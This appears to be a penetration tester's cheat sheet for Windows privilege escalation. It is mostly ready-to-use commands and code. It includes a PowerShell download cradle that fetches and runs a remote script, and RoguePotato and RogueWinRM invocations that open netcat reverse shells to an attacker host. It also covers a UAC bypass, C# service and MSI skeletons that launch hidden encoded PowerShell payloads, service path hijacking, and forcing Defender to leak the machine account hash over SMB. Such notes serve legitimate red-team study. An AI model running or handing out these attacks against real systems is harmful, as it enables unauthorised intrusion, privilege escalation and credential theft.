Comment on page
Windows
PS C:\Temp\> Set-ExecutionPolicy Bypass -Scope Process -Force
PS C:\Temp\> . .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck
or:
powershell -ep bypass -c ". .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck | Tee-Object result.txt
IEX(New-Object Net.WebClient).downloadString('<url>/PowerUp.ps1') ;Invoke-AllChecks
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
Download & start hhupd.exe, get it to start a iexplore.exe in the uac dialog and start cmd.exe in the browsers save file dialog
If privileges are disabled you can use AdjustTokenPrivileges. All these privileged are configured via "secpol.msc -> Local Policies -> User Rights Assignment".
These privileges allow unrestricted read/write access to every file on the system. They have to be activated first though for which you can use this ps-script:
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege <source> <target>
This privilege allows to impersonate the user connecting. This connection can happen via HTTP NTLM Auth, SMB or Named Pipes.
This was patched in August 2020 (spooler won't connect to your named pipe anymore, the underlying technique still works though).
This requires that the victim server can reach your box on port 135. You run the OxidResolver and use socat to port your port 135 to the OxidResolvers port. Then you can the exploit:
# on attacker box
socat tcp-listen:135,reuseaddr,fork tcp:<oxidip>:9999
# on target
RoguePotato.exe -r <attackerip> -e "c:\programdata\nc.exe -e cmd.exe <ip> <port>" -l 9999
Useable if WinRM is not already is not running (Unpatched). Usage (don't quote path):
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "<ip> <port> -e cmd"
There are lots of different ones out there, a good collection is UACME but it is getting detected very easily. In Covenant you can do:
BypassUACCommand cmd.exe "/c powershell -enc <cmd>"
Check Permissions on a service:
PowerShell 'service name' | Get-ServiceAcl | Select-Object -ExpandProperty Access
For a payload that behaves like a real service use the following skeleton code (create a new c# console application):
protected override void OnStart(string[] args)
{
var si = new ProcessStartInfo
{
FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
Arguments = @"-Sta -Nop -Window Hidden -EncodedCommand <cmd>"
};
var proc = new Process
{
StartInfo = si
};
var t = new Thread(() =>
{
proc.Start();
proc.WaitForExit();
proc.Dispose();
});
t.Start();
}
Finally modify & restart the service:
sc config "service name" binPath= "c:\temp\x.exe"
sc qc "service name"
sc stop "service name"
sc start "service name"
Create a MSI Installer in Visual Studio. Skeleton:
using System.Diagnostics;
namespace Service
{
class Program
{
static void Main(string[] args)
{
var si = new ProcessStartInfo
{
FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
Arguments = @"-Sta -Nop -Window Hidden -EncodedCommand <cmd>"
};
var proc = new Process
{
StartInfo = si
};
proc.Start();
proc.WaitForExit();
proc.Dispose();
}
}
}
Set output type to WindowsApplication, add a new project to the solution (of type SetupWizard). Make sure it includes "primary output from <project>". Modify settings as you need. To make sure it gets installed right-click on the installer project: View->CustomActions. Then add a custom action to install that containts the primary output from before.
Finally run:
msiexec /i <filename> /qn
Run Windows Defender vs. SMB share to get the machine account hash:
C:\progra~1\Window~1\Mpcmdrun.exe -Scan -ScanType 3 -File '\\<ip>\public\file'
This hash can be cracked via crack.sh or if the target is a DC, we can pth to secretsdump (requires NT hash support (deprecated)).
Last modified 9mo ago